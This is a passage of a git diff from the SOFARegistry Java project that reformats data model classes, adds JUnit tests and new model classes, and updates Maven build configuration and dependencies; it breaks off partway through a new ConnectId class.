method for property scope. + * + * @return property value of scope + */ + public String getScope() { + return scope; + } + + /** + * Setter method for property scope. + * + * @param scope value to be assigned to property scope + */ + public void setScope(String scope) { + this.scope = scope; + } + + /** + * Getter method for property subscriberRegistIds. + * + * @return property value of subscriberRegistIds + */ + public List getSubscriberRegistIds() { + return subscriberRegistIds; + } + + /** + * Setter method for property subscriberRegistIds. + * + * @param subscriberRegistIds value to be assigned to property subscriberRegistIds + */ + public void setSubscriberRegistIds(List subscriberRegistIds) { + this.subscriberRegistIds = subscriberRegistIds; + } + + /** + * Getter method for property data. + * + * @return property value of data + */ + public Map> getData() { + return data; + } + + /** + * Setter method for property data. + * + * @param data value to be assigned to property data + */ + public void setData(Map> data) { + this.data = data; + } + + /** + * Getter method for property version. + * + * @return property value of version + */ + public Long getVersion() { + return version; + } + + /** + * Setter method for property version. + * + * @param version value to be assigned to property version + */ + public void setVersion(Long version) { + this.version = version; + } + + /** + * Getter method for property localZone. + * + * @return property value of localZone + */ + public String getLocalZone() { + return localZone; + } + + /** + * Setter method for property localZone. + * + * @param localZone value to be assigned to property localZone + */ + public void setLocalZone(String localZone) { + this.localZone = localZone; + } + + /** + * To string string. + * + * @return the string + */ + @Override + public String toString() { + return "ReceivedData{" + + "dataId='" + + dataId + + '\'' + + ", group='" + + group + + '\'' + + ", instanceId='" + + instanceId + + '\'' + + ", segment='" + + segment + + '\'' + + ", scope='" + + scope + + '\'' + + ", subscriberRegistIds=" + + subscriberRegistIds + + ", version=" + + version + + ", localZone='" + + localZone + + '\'' + + '}'; + } } diff --git a/core/src/main/java/com/alipay/sofa/registry/core/model/RegisterResponse.java b/core/src/main/java/com/alipay/sofa/registry/core/model/RegisterResponse.java index 33ce9e5dd..8bf700944 100644 --- a/core/src/main/java/com/alipay/sofa/registry/core/model/RegisterResponse.java +++ b/core/src/main/java/com/alipay/sofa/registry/core/model/RegisterResponse.java @@ -19,121 +19,129 @@ import java.io.Serializable; /** - * * @author zhuoyu.sjw * @version $Id: RegisterResponse.java, v 0.1 2018-03-05 18:11 zhuoyu.sjw Exp $$ */ public class RegisterResponse implements Serializable { - private static final long serialVersionUID = -3692498042919432434L; - - private boolean success; - - private String registId; - - private long version; - - private boolean refused; - - private String message; - - /** - * Getter method for property success. - * - * @return property value of success - */ - public boolean isSuccess() { - return success; - } - - /** - * Setter method for property success. - * - * @param success value to be assigned to property success - */ - public void setSuccess(boolean success) { - this.success = success; - } - - /** - * Getter method for property registId. - * - * @return property value of registId - */ - public String getRegistId() { - return registId; - } - - /** - * Setter method for property registId. - * - * @param registId value to be assigned to property registId - */ - public void setRegistId(String registId) { - this.registId = registId; - } - - /** - * Getter method for property version. - * - * @return property value of version - */ - public long getVersion() { - return version; - } - - /** - * Setter method for property version. - * - * @param version value to be assigned to property version - */ - public void setVersion(long version) { - this.version = version; - } - - /** - * Getter method for property refused. - * - * @return property value of refused - */ - public boolean isRefused() { - return refused; - } - - /** - * Setter method for property refused. - * - * @param refused value to be assigned to property refused - */ - public void setRefused(boolean refused) { - this.refused = refused; - } - - /** - * Getter method for property message. - * - * @return property value of message - */ - public String getMessage() { - return message; - } - - /** - * Setter method for property message. - * - * @param message value to be assigned to property message - */ - public void setMessage(String message) { - this.message = message; - } - - /** - * @see Object#toString() - */ - @Override - public String toString() { - return "RegisterResponse{" + "success=" + success + ", registId='" + registId + '\'' - + ", version=" + version + ", refused=" + refused + ", message='" + message + '\'' - + '}'; - } + private static final long serialVersionUID = -3692498042919432434L; + + private boolean success; + + private String registId; + + private long version; + + private boolean refused; + + private String message; + + /** + * Getter method for property success. + * + * @return property value of success + */ + public boolean isSuccess() { + return success; + } + + /** + * Setter method for property success. + * + * @param success value to be assigned to property success + */ + public void setSuccess(boolean success) { + this.success = success; + } + + /** + * Getter method for property registId. + * + * @return property value of registId + */ + public String getRegistId() { + return registId; + } + + /** + * Setter method for property registId. + * + * @param registId value to be assigned to property registId + */ + public void setRegistId(String registId) { + this.registId = registId; + } + + /** + * Getter method for property version. + * + * @return property value of version + */ + public long getVersion() { + return version; + } + + /** + * Setter method for property version. + * + * @param version value to be assigned to property version + */ + public void setVersion(long version) { + this.version = version; + } + + /** + * Getter method for property refused. + * + * @return property value of refused + */ + public boolean isRefused() { + return refused; + } + + /** + * Setter method for property refused. + * + * @param refused value to be assigned to property refused + */ + public void setRefused(boolean refused) { + this.refused = refused; + } + + /** + * Getter method for property message. + * + * @return property value of message + */ + public String getMessage() { + return message; + } + + /** + * Setter method for property message. + * + * @param message value to be assigned to property message + */ + public void setMessage(String message) { + this.message = message; + } + + /** @see Object#toString() */ + @Override + public String toString() { + return "RegisterResponse{" + + "success=" + + success + + ", registId='" + + registId + + '\'' + + ", version=" + + version + + ", refused=" + + refused + + ", message='" + + message + + '\'' + + '}'; + } } diff --git a/core/src/main/java/com/alipay/sofa/registry/core/model/Result.java b/core/src/main/java/com/alipay/sofa/registry/core/model/Result.java index 90e8c7733..cd412f79a 100644 --- a/core/src/main/java/com/alipay/sofa/registry/core/model/Result.java +++ b/core/src/main/java/com/alipay/sofa/registry/core/model/Result.java @@ -19,61 +19,75 @@ import java.io.Serializable; /** - * * @author zhuoyu.sjw * @version $Id: Result.java, v 0.1 2017-11-30 15:48 zhuoyu.sjw Exp $$ */ public class Result implements Serializable { - private static final long serialVersionUID = -3861771860629530576L; + private static final long serialVersionUID = -3861771860629530576L; + + private boolean success; + + private String message; + + public Result() {} + + public Result(boolean success, String message) { + this.success = success; + this.message = message; + } - private boolean success; + public static Result failed(String message) { + return new Result(false, message); + } - private String message; + public static Result success() { + return new Result(true, null); + } - /** - * Getter method for property success. - * - * @return property value of success - */ - public boolean isSuccess() { - return success; - } + /** + * Getter method for property success. + * + * @return property value of success + */ + public boolean isSuccess() { + return success; + } - /** - * Setter method for property success. - * - * @param success value to be assigned to property success - */ - public void setSuccess(boolean success) { - this.success = success; - } + /** + * Setter method for property success. + * + * @param success value to be assigned to property success + */ + public void setSuccess(boolean success) { + this.success = success; + } - /** - * Getter method for property message. - * - * @return property value of message - */ - public String getMessage() { - return message; - } + /** + * Getter method for property message. + * + * @return property value of message + */ + public String getMessage() { + return message; + } - /** - * Setter method for property message. - * - * @param message value to be assigned to property message - */ - public void setMessage(String message) { - this.message = message; - } + /** + * Setter method for property message. + * + * @param message value to be assigned to property message + */ + public void setMessage(String message) { + this.message = message; + } - /** - * To string string. - * - * @return the string - */ - @Override - public String toString() { - return "Result{" + "success=" + success + ", message='" + message + '\'' + '}'; - } + /** + * To string string. + * + * @return the string + */ + @Override + public String toString() { + return "Result{" + "success=" + success + ", message='" + message + '\'' + '}'; + } } diff --git a/core/src/main/java/com/alipay/sofa/registry/core/model/ScopeEnum.java b/core/src/main/java/com/alipay/sofa/registry/core/model/ScopeEnum.java index aad4f628b..fdb067119 100644 --- a/core/src/main/java/com/alipay/sofa/registry/core/model/ScopeEnum.java +++ b/core/src/main/java/com/alipay/sofa/registry/core/model/ScopeEnum.java @@ -24,19 +24,19 @@ */ public enum ScopeEnum { - /** zone scope: only can receive pub list at same zone */ - zone, - /** dataCenter scope: only can receive pub list at same dataCenter (multi zone) */ - dataCenter, - /** global scope: can receive pub list at all dataCenter (multi zone) */ - global; + /** zone scope: only can receive pub list at same zone */ + zone, + /** dataCenter scope: only can receive pub list at same dataCenter (multi zone) */ + dataCenter, + /** global scope: can receive pub list at all dataCenter (multi zone) */ + global; - public static boolean contains(String name) { - for (ScopeEnum scopeEnum : values()) { - if (scopeEnum.name().equals(name)) { - return true; - } - } - return false; + public static boolean contains(String name) { + for (ScopeEnum scopeEnum : values()) { + if (scopeEnum.name().equals(name)) { + return true; + } } + return false; + } } diff --git a/core/src/main/java/com/alipay/sofa/registry/core/model/SubscriberRegister.java b/core/src/main/java/com/alipay/sofa/registry/core/model/SubscriberRegister.java index 8dd822779..2c18059a4 100644 --- a/core/src/main/java/com/alipay/sofa/registry/core/model/SubscriberRegister.java +++ b/core/src/main/java/com/alipay/sofa/registry/core/model/SubscriberRegister.java @@ -17,40 +17,39 @@ package com.alipay.sofa.registry.core.model; /** - * * @author zhuoyu.sjw * @version $Id: SubscriberRegister.java, v 0.1 2017-11-28 15:40 zhuoyu.sjw Exp $$ */ public class SubscriberRegister extends BaseRegister { - private static final long serialVersionUID = 5884257055097046886L; + private static final long serialVersionUID = 5884257055097046886L; - private String scope; + private String scope; - /** - * Getter method for property scope. - * - * @return property value of scope - */ - public String getScope() { - return scope; - } + /** + * Getter method for property scope. + * + * @return property value of scope + */ + public String getScope() { + return scope; + } - /** - * Setter method for property scope. - * - * @param scope value to be assigned to property scope - */ - public void setScope(String scope) { - this.scope = scope; - } + /** + * Setter method for property scope. + * + * @param scope value to be assigned to property scope + */ + public void setScope(String scope) { + this.scope = scope; + } - /** - * To string string. - * - * @return the string - */ - @Override - public String toString() { - return "SubscriberRegister{" + "scope='" + scope + '\'' + '}' + super.toString(); - } + /** + * To string string. + * + * @return the string + */ + @Override + public String toString() { + return "SubscriberRegister{" + "scope='" + scope + '\'' + '}' + super.toString(); + } } diff --git a/core/src/main/java/com/alipay/sofa/registry/core/model/SyncConfigRequest.java b/core/src/main/java/com/alipay/sofa/registry/core/model/SyncConfigRequest.java index fa3be30f7..5023ae69d 100644 --- a/core/src/main/java/com/alipay/sofa/registry/core/model/SyncConfigRequest.java +++ b/core/src/main/java/com/alipay/sofa/registry/core/model/SyncConfigRequest.java @@ -19,62 +19,67 @@ import java.io.Serializable; /** - * * @author zhuoyu.sjw * @version $Id: SyncConfigRequest.java, v 0.1 2018-03-14 23:06 zhuoyu.sjw Exp $$ */ public class SyncConfigRequest implements Serializable { - private static final long serialVersionUID = -843642420869816713L; + private static final long serialVersionUID = -843642420869816713L; - private String dataCenter; + private String dataCenter; - private String zone; + private String zone; - /** - * Getter method for property dataCenter. - * - * @return property value of dataCenter - */ - public String getDataCenter() { - return dataCenter; - } + /** + * Getter method for property dataCenter. + * + * @return property value of dataCenter + */ + public String getDataCenter() { + return dataCenter; + } - /** - * Setter method for property dataCenter. - * - * @param dataCenter value to be assigned to property dataCenter - */ - public void setDataCenter(String dataCenter) { - this.dataCenter = dataCenter; - } + /** + * Setter method for property dataCenter. + * + * @param dataCenter value to be assigned to property dataCenter + */ + public void setDataCenter(String dataCenter) { + this.dataCenter = dataCenter; + } - /** - * Getter method for property zone. - * - * @return property value of zone - */ - public String getZone() { - return zone; - } + /** + * Getter method for property zone. + * + * @return property value of zone + */ + public String getZone() { + return zone; + } - /** - * Setter method for property zone. - * - * @param zone value to be assigned to property zone - */ - public void setZone(String zone) { - this.zone = zone; - } + /** + * Setter method for property zone. + * + * @param zone value to be assigned to property zone + */ + public void setZone(String zone) { + this.zone = zone; + } - /** - * To string string. - * - * @return the string - */ - @Override - public String toString() { - return "SyncConfigRequest{" + "dataCenter='" + dataCenter + '\'' + ", zone='" + zone + '\'' - + '}'; - } + /** + * To string string. + * + * @return the string + */ + @Override + public String toString() { + return "SyncConfigRequest{" + + "dataCenter='" + + dataCenter + + '\'' + + ", zone='" + + zone + + '\'' + + '}'; + } } diff --git a/core/src/main/java/com/alipay/sofa/registry/core/model/SyncConfigResponse.java b/core/src/main/java/com/alipay/sofa/registry/core/model/SyncConfigResponse.java index 70d9d972c..daa01b175 100644 --- a/core/src/main/java/com/alipay/sofa/registry/core/model/SyncConfigResponse.java +++ b/core/src/main/java/com/alipay/sofa/registry/core/model/SyncConfigResponse.java @@ -20,62 +20,65 @@ import java.util.List; /** - * * @author zhuoyu.sjw * @version $Id: SyncConfigResponse.java, v 0.1 2018-03-14 23:08 zhuoyu.sjw Exp $$ */ public class SyncConfigResponse extends Result implements Serializable { - private static final long serialVersionUID = 5407436619633166827L; + private static final long serialVersionUID = 5407436619633166827L; - private List availableSegments; + private List availableSegments; - private int retryInterval; + private int retryInterval; - /** - * Getter method for property availableSegments. - * - * @return property value of availableSegments - */ - public List getAvailableSegments() { - return availableSegments; - } + /** + * Getter method for property availableSegments. + * + * @return property value of availableSegments + */ + public List getAvailableSegments() { + return availableSegments; + } - /** - * Setter method for property availableSegments. - * - * @param availableSegments value to be assigned to property availableSegments - */ - public void setAvailableSegments(List availableSegments) { - this.availableSegments = availableSegments; - } + /** + * Setter method for property availableSegments. + * + * @param availableSegments value to be assigned to property availableSegments + */ + public void setAvailableSegments(List availableSegments) { + this.availableSegments = availableSegments; + } - /** - * Getter method for property retryInterval. - * - * @return property value of retryInterval - */ - public int getRetryInterval() { - return retryInterval; - } + /** + * Getter method for property retryInterval. + * + * @return property value of retryInterval + */ + public int getRetryInterval() { + return retryInterval; + } - /** - * Setter method for property retryInterval. - * - * @param retryInterval value to be assigned to property retryInterval - */ - public void setRetryInterval(int retryInterval) { - this.retryInterval = retryInterval; - } + /** + * Setter method for property retryInterval. + * + * @param retryInterval value to be assigned to property retryInterval + */ + public void setRetryInterval(int retryInterval) { + this.retryInterval = retryInterval; + } - /** - * To string string. - * - * @return the string - */ - @Override - public String toString() { - return "SyncConfigResponse{" + "availableSegments=" + availableSegments - + ", retryInterval=" + retryInterval + '}'; - } + /** + * To string string. + * + * @return the string + */ + @Override + public String toString() { + return "SyncConfigResponse{" + + "availableSegments=" + + availableSegments + + ", retryInterval=" + + retryInterval + + '}'; + } } diff --git a/core/src/test/java/com/alipay/sofa/registry/core/constants/EventTypeConstantsTest.java b/core/src/test/java/com/alipay/sofa/registry/core/constants/EventTypeConstantsTest.java new file mode 100644 index 000000000..b497c875f --- /dev/null +++ b/core/src/test/java/com/alipay/sofa/registry/core/constants/EventTypeConstantsTest.java @@ -0,0 +1,30 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.core.constants; + +import org.junit.Assert; +import org.junit.Test; + +public class EventTypeConstantsTest { + + @Test + public void test() { + Assert.assertEquals('R', EventTypeConstants.getEventTypeFlag(EventTypeConstants.REGISTER)); + Assert.assertEquals('U', EventTypeConstants.getEventTypeFlag(EventTypeConstants.UNREGISTER)); + Assert.assertEquals('N', EventTypeConstants.getEventTypeFlag("xxx")); + } +} diff --git a/core/src/test/java/com/alipay/sofa/registry/core/model/BaseRegisterTest.java b/core/src/test/java/com/alipay/sofa/registry/core/model/BaseRegisterTest.java new file mode 100644 index 000000000..e78f7ce29 --- /dev/null +++ b/core/src/test/java/com/alipay/sofa/registry/core/model/BaseRegisterTest.java @@ -0,0 +1,52 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.core.model; + +import org.junit.Assert; +import org.junit.Test; + +public class BaseRegisterTest { + @Test + public void test() { + BaseRegister register = new BaseRegister(); + register.setInstanceId("x1"); + Assert.assertEquals(register.getInstanceId(), "x1"); + + register.setZone("x2"); + Assert.assertEquals(register.getZone(), "x2"); + + register.setGroup("x3"); + Assert.assertEquals(register.getGroup(), "x3"); + + register.setProcessId("x4"); + Assert.assertEquals(register.getProcessId(), "x4"); + + register.setClientId("x5"); + Assert.assertEquals(register.getClientId(), "x5"); + + register.setIp("x6"); + Assert.assertEquals(register.getIp(), "x6"); + + register.setPort(999); + Assert.assertEquals(register.getPort().intValue(), 999); + + register.setDataInfoId("x7"); + Assert.assertEquals(register.getDataInfoId(), "x7"); + + Assert.assertNotNull(register.toString()); + } +} diff --git a/core/src/test/java/com/alipay/sofa/registry/core/model/RegisterResponseTest.java b/core/src/test/java/com/alipay/sofa/registry/core/model/RegisterResponseTest.java new file mode 100644 index 000000000..aced91b51 --- /dev/null +++ b/core/src/test/java/com/alipay/sofa/registry/core/model/RegisterResponseTest.java @@ -0,0 +1,32 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.core.model; + +import org.junit.Assert; +import org.junit.Test; + +public class RegisterResponseTest { + @Test + public void test() { + RegisterResponse response = new RegisterResponse(); + response.setRegistId("x1"); + Assert.assertEquals(response.getRegistId(), "x1"); + + response.setMessage("x2"); + Assert.assertEquals(response.getMessage(), "x2"); + } +} diff --git a/core/src/test/java/com/alipay/sofa/registry/core/model/ResultTest.java b/core/src/test/java/com/alipay/sofa/registry/core/model/ResultTest.java new file mode 100644 index 000000000..ea1e53e34 --- /dev/null +++ b/core/src/test/java/com/alipay/sofa/registry/core/model/ResultTest.java @@ -0,0 +1,36 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.core.model; + +import org.junit.Assert; +import org.junit.Test; + +public class ResultTest { + @Test + public void test() { + Result result = new Result(false, "xxx"); + Assert.assertFalse(result.isSuccess()); + Assert.assertEquals(result.getMessage(), "xxx"); + + result = Result.failed("yyy"); + Assert.assertFalse(result.isSuccess()); + Assert.assertEquals(result.getMessage(), "yyy"); + + result = Result.success(); + Assert.assertTrue(result.isSuccess()); + } +} diff --git a/pom.xml b/pom.xml index 8d1e42280..05d569c3c 100644 --- a/pom.xml +++ b/pom.xml @@ -2,11 +2,11 @@ + 4.0.0 - com.alipay.sofa registry-parent - 5.2.0-SNAPSHOT + 6.0.1 pom ${project.groupId}:${project.artifactId} @@ -59,7 +59,7 @@ 1.8 1.8 UTF-8 - 1.5.2 + 1.6.2 2.6 18.0 1.0.12 @@ -67,24 +67,34 @@ 5.0.2 ${junit.version}.2 1.0.2 - 3.3.6 - 4.1.25.Final + 3.3.12 + 4.1.42.Final 2.26 3.5.1 1.7.21 1.5.2 1.10.19 1.6.6 - 1.2.4 + 1.3.5 4.0.2 2.4 - 9.4.12.v20180830 + [9.4.17.v20190418,9.4.19.v20190610] + 6.4.6 + 2.0.0 ${user.dir} -Dnetwork_interface_denylist=docker0 + + false + false + + org.slf4j + jul-to-slf4j + 1.7.9 + org.springframework.boot spring-boot-starter-parent @@ -114,17 +124,17 @@ com.alipay.sofa - registry-consistency + registry-store-common ${project.version} com.alipay.sofa - registry-store-api + registry-store-jraft ${project.version} com.alipay.sofa - registry-store-jraft + registry-store-jdbc ${project.version} @@ -162,6 +172,11 @@ registry-server-integration ${project.version} + + com.alipay.sofa + registry-server-shared + ${project.version} + org.slf4j @@ -307,6 +322,67 @@ ${metrics.version} + + commons-collections + commons-collections + 3.2.2 + + + io.prometheus + simpleclient + 0.9.0 + + + + io.prometheus + simpleclient_hotspot + 0.9.0 + + + + io.prometheus + simpleclient_httpserver + 0.9.0 + + + io.prometheus + simpleclient_dropwizard + 0.9.0 + + + + + org.springframework.boot + spring-boot-starter-jdbc + 1.5.17.RELEASE + + + + + com.alibaba + druid + 1.2.5 + + + + + org.mybatis + mybatis + 3.2.8 + + + org.mybatis + mybatis-spring + 1.2.2 + + + + + mysql + mysql-connector-java + 5.1.47 + + junit @@ -332,6 +408,22 @@ ${powermock.version} test + + com.alipay.common + tracer + 1.0.55 + test + + + org.rocksdb + rocksdbjni + ${rocksdbjni.version} + + + com.github.rholder + guava-retrying + ${guava-retrying.version} + @@ -351,51 +443,68 @@ - com.mycila - license-maven-plugin - 3.0 + pl.project13.maven + git-commit-id-plugin + 4.0.0 - generate-sources + get-the-git-infos - remove - format + revision + initialize - true -
${main.user.dir}/tools/codestyle/HEADER
- - **/src/main/java/** - **/src/test/java/** - - true - - SLASHSTAR_STYLE - + true + ${project.build.outputDirectory}/git.properties + + ^git.build.(time|version)$ + ^git.commit.id.(abbrev|full)$ + + full
- com.googlecode.maven-java-formatter-plugin - maven-java-formatter-plugin - 0.4 + com.diffplug.spotless + spotless-maven-plugin + 1.20.0 - - - format - - + + + apply + + compile + - - ${main.user.dir}/tools/codestyle/formatter.xml - UTF-8 - - - - org.apache.maven.plugins - maven-surefire-plugin - 2.21.0 + + + + + + .xml + .gitignore + .properties + + + + + + + + + src/**/java/**/*.java + + + + 1.7 + + + + ${user.dir}/tools/codestyle/HEADER + + + org.jacoco @@ -403,6 +512,12 @@ 0.7.9 false + + **/bootstrap/** + **/executor/** + **/remoting/** + **/resource/** + @@ -420,78 +535,170 @@ + + org.apache.maven.plugins + maven-surefire-plugin + 2.8.1 + + + -Xmx1024m -XX:PermSize=256m -XX:MaxPermSize=512m + + ${isSkipUnitTest} + + + **/*Test.java + + + + + + + once + true + + - jdk8 + dev - [1.8,) + true - - false - true - + + + maven-snapshot + https://oss.sonatype.org/content/repositories/snapshots + + false + + + true + + + + central_prod + http://mvn.test.alipay.net/artifactory/content/groups/public/ + + true + + + + central + http://mvn.dev.alipay.net/artifactory/content/groups/public/ + + true + + + + + + maven-snapshot + https://oss.sonatype.org/content/repositories/snapshots + + false + + + true + + + + central_prod + http://mvn.test.alipay.net/artifactory/content/groups/public/ + + true + + + + central + http://mvn.dev.alipay.net/artifactory/content/groups/public/ + + true + + + - release - - - - org.apache.maven.plugins - maven-javadoc-plugin - 2.10.4 - - - attach-javadocs - - jar - - - -Xdoclint:none - - - - - - org.sonatype.plugins - nexus-staging-maven-plugin - 1.6.7 - true - - ossrh - https://oss.sonatype.org/ - false - - - - org.apache.maven.plugins - maven-gpg-plugin - 1.5 - - - sign-artifacts - verify - - sign - - - - - - + test + + + maven-snapshot + https://oss.sonatype.org/content/repositories/snapshots + + false + + + true + + + + central_prod + http://mvn.test.alipay.net/artifactory/content/groups/public/ + + true + + + + + + maven-snapshot + https://oss.sonatype.org/content/repositories/snapshots + + false + + + true + + + + central_prod + http://mvn.test.alipay.net/artifactory/content/groups/public/ + + true + + + + + + + antcode-release - ossrh - https://oss.sonatype.org/service/local/staging/deploy/maven2/ + maven-release + antcode maven release + http://mvn.test.alipay.net/artifactory/content/repositories/maven-release/ - ossrh - https://oss.sonatype.org/content/repositories/snapshots + maven-release + antcode maven snapshot + http://mvn.test.alipay.net/artifactory/content/repositories/maven-snapshot/ + + + alipay-dev + + + nexus-server@alipay-dev + alipay dev Repository + http://mvn.dev.alipay.net/artifactory/content/repositories/middleware + + + + + + alipay-release + + + nexus-server@alipay-release + alipay release Repository + http://mvn.test.alipay.net/artifactory/content/repositories/middleware + + + +
diff --git a/server/common/model/pom.xml b/server/common/model/pom.xml index d87c55c92..99e230bc0 100644 --- a/server/common/model/pom.xml +++ b/server/common/model/pom.xml @@ -5,7 +5,7 @@ com.alipay.sofa registry-common - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml 4.0.0 @@ -18,12 +18,14 @@ - com.alipay.sofa - registry-core + junit + junit + test + com.alipay.sofa - registry-consistency + registry-core com.fasterxml.jackson.core @@ -33,5 +35,13 @@ com.alipay.sofa registry-common-util + + commons-collections + commons-collections + + + com.google.protobuf + protobuf-java + diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/ClientOffPublishers.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/ClientOffPublishers.java new file mode 100644 index 000000000..104409471 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/ClientOffPublishers.java @@ -0,0 +1,44 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model; + +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.google.common.collect.Lists; +import java.util.Collections; +import java.util.List; + +public class ClientOffPublishers { + private final ConnectId connectId; + private final List publishers; + + public ClientOffPublishers(ConnectId connectId, List publishers) { + this.connectId = connectId; + this.publishers = Collections.unmodifiableList(Lists.newArrayList(publishers)); + } + + public ConnectId getConnectId() { + return connectId; + } + + public boolean isEmpty() { + return publishers.isEmpty(); + } + + public List getPublishers() { + return publishers; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/CommonResponse.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/CommonResponse.java index e85455adf..3072b1575 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/CommonResponse.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/CommonResponse.java @@ -26,86 +26,97 @@ */ public class CommonResponse implements Serializable { - private static final long serialVersionUID = 8269764971983130557L; + private static final long serialVersionUID = 8269764971983130557L; - private boolean success; + private boolean success; - private String message; + private String message; - /** - * constructor - */ - public CommonResponse() { - } + /** constructor */ + public CommonResponse() {} - /** - * constructor - * @param success - * @param message - */ - public CommonResponse(boolean success, String message) { - this.success = success; - this.message = message; - } + /** + * constructor + * + * @param success + * @param message + */ + public CommonResponse(boolean success, String message) { + this.success = success; + this.message = message; + } - /** - * build success resp - * @return - */ - public static CommonResponse buildSuccessResponse() { - return new CommonResponse(true, ""); - } + /** + * build success resp + * + * @return + */ + public static CommonResponse buildSuccessResponse() { + return new CommonResponse(true, ""); + } - /** - * build success resp - * @return - */ - public static CommonResponse buildSuccessResponse(String msg) { - return new CommonResponse(true, msg); - } + /** + * build success resp + * + * @return + */ + public static CommonResponse buildSuccessResponse(String msg) { + return new CommonResponse(true, msg); + } - /** - * build fail resp - * @param msg - * @return - */ - public static CommonResponse buildFailedResponse(String msg) { - return new CommonResponse(false, msg); - } + /** + * build fail resp + * + * @param msg + * @return + */ + public static CommonResponse buildFailedResponse(String msg) { + return new CommonResponse(false, msg); + } - /** - * Getter method for property success. - * - * @return property value of success - */ - public boolean isSuccess() { - return success; - } + /** + * Getter method for property success. + * + * @return property value of success + */ + public boolean isSuccess() { + return success; + } - /** - * Setter method for property success. - * - * @param success value to be assigned to property success - */ - public void setSuccess(boolean success) { - this.success = success; - } + /** + * Setter method for property success. + * + * @param success value to be assigned to property success + */ + public void setSuccess(boolean success) { + this.success = success; + } - /** - * Getter method for property message. - * - * @return property value of message - */ - public String getMessage() { - return message; - } + /** + * Getter method for property message. + * + * @return property value of message + */ + public String getMessage() { + return message; + } - /** - * Setter method for property message. - * - * @param message value to be assigned to property message - */ - public void setMessage(String message) { - this.message = message; - } -} \ No newline at end of file + /** + * Setter method for property message. + * + * @param message value to be assigned to property message + */ + public void setMessage(String message) { + this.message = message; + } + + /** @see Object#toString() */ + @Override + public String toString() { + final StringBuilder sb = new StringBuilder("CommonResponse{"); + sb.append("success=").append(success); + sb.append(", message='").append(message).append('\''); + sb.append('}'); + return sb.toString(); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/ConnectId.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/ConnectId.java new file mode 100644 index 000000000..c52adc41e --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/ConnectId.java @@ -0,0 +1,147 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model; + +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.store.URL; +import com.fasterxml.jackson.annotation.JsonCreator; +import com.fasterxml.jackson.annotation.JsonProperty; +import java.io.Serializable; +import java.net.InetSocketAddress; +import java.util.Objects; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-12-02 21:32 yuzhi.lyz Exp $ + */ +public final class ConnectId implements Serializable { + private final String clientHostAddress; + private final int clientPort; + 